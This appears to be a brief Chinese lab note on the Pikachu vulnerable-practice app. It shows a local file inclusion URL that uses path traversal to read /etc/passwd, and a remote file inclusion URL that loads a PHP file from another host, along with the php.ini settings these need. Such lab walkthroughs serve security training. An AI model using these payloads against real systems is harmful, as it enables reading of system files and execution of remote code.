1.File Inclusion(local)
正常情况下访问
http://192.168.1.150/pikachu-labs/vul/fileinclude/fi_local.php?filename=file1.php&submit=提交
尝试访问/etc/passwd (/etc/php.ini 需设Allow_url_include On)
http://192.168.1.150/pikachu-labs/vul/fileinclude/fi_local.php?filename=../../../../../etc/passwd&submit=提交
2.File Inclusion(remote)
正常情况下访问
# FileInclude.php
<?php phpinfo(); ?>
尝试访问http://192.168.1.1/FileInclude.php
(192.168.1.150 /etc/php.ini 需设allow_url_ftp on)
http://192.168.1.150/pikachu-labs/vul/fileinclude/fi_remote.php?filename=http://192.168.1.1/FileInclude.php&submit=提交查询